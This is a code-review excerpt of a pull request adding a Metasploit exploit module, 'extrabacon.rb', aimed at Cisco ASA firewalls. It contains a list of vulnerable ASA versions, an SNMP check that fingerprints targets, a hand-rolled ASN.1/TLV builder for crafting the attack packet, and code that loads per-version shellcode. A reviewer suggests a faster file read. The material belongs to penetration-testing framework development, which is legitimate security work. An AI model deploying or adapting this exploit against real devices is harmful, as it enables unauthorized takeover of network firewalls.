modules/exploits/firewall/extrabacon.rb

```diff
@@ -0,0 +1,371 @@
+                      "asa803-6" => "Cisco Adaptive Security Appliance Version 8.0(3)6",
+                      "asa804" => "Cisco Adaptive Security Appliance Version 8.0(4)",
+                      "asa804-32" => "Cisco Adaptive Security Appliance Version 8.0(4)32",
+                      "asa805" => "Cisco Adaptive Security Appliance Version 8.0(5)",
+                      "asa821" => "Cisco Adaptive Security Appliance Version 8.2(1)",
+                      "asa822" => "Cisco Adaptive Security Appliance Version 8.2(2)",
+                      "asa823" => "Cisco Adaptive Security Appliance Version 8.2(3)",
+                      "asa824" => "Cisco Adaptive Security Appliance Version 8.2(4)",
+                      "asa825" => "Cisco Adaptive Security Appliance Version 8.2(5)",
+                      "asa831" => "Cisco Adaptive Security Appliance Version 8.3(1)",
+                      "asa832" => "Cisco Adaptive Security Appliance Version 8.3(2)",
+                      "asa841" => "Cisco Adaptive Security Appliance Version 8.4(1)",
+                      "asa842" => "Cisco Adaptive Security Appliance Version 8.4(2)",
+                      "asa843" => "Cisco Adaptive Security Appliance Version 8.4(3)",
+                      "asa844" => "Cisco Adaptive Security Appliance Version 8.4(4)",
+                    ]
+
+
+    manager = SNMP::Manager.new(:host => target_asa, :port => target_port, :community => comm)
+
+    resp = manager.get(["sysDescr.0"])
+    resp.each_varbind do |vb|
+      if exba_targets.has_value?(vb.value.to_s)
+        print_status("[#{target_asa}]: Vulnerable target detected: #{vb.value.to_s}\n")
+        return Exploit::CheckCode::Vulnerable
+      else
+        print_warning("Unable to determine if target is vulnerable.  Response: #{vb.value.to_s}")
+        return Exploit::CheckCode::Unknown
+      end
+    end
+  end
+
+  # TODO: write code that is actually type aware
+
+  def my_tlv(tag="\x30\x82", data)
+    ln = 0
+    p = ""
+    p.force_encoding('binary')
+    p << tag
+
+    # compute length
+
+    data.each do |x|
+      ln += x.length
+    end
+
+    # insert it
+
+    if tag == "\x04\x81" || tag == "\x30\x81" || tag == "\x06\x81"
+      p << ln
+    elsif ln >= 0x80 || tag == "\xa5\x82"
+      p << [ln].pack('n')
+    else
+      p << ln
+    end
+
+    # insert all items
+
+    data.each do |x|
+      p.force_encoding('binary')
+      x.force_encoding('binary')
+      p << x
+    end
+    p
+  end
+
+  def hex(buf)
+    return Rex::Text.to_hex_dump(buf, width=16, base=0)
+  end
+
+  def setup
+    sc_file = File.join(Msf::Config.data_directory, "exploits", "EXTRABACON", "versions", "shellcode_" + target['Version'] + ".rb")
+
+    if datastore['Verbose'] == true
+      print_status("Using config file: #{sc_file}")
+    end
+
+    if !(File.file?(sc_file))
+      print_error("#{sc_file} not found!")
+      exit
+    end
+
+    content = ""
+    f = File.open(sc_file, "rb")
```

Comment:
This is kind of slow, you might do: ``content = f.read`` instead to get it all in one swoop.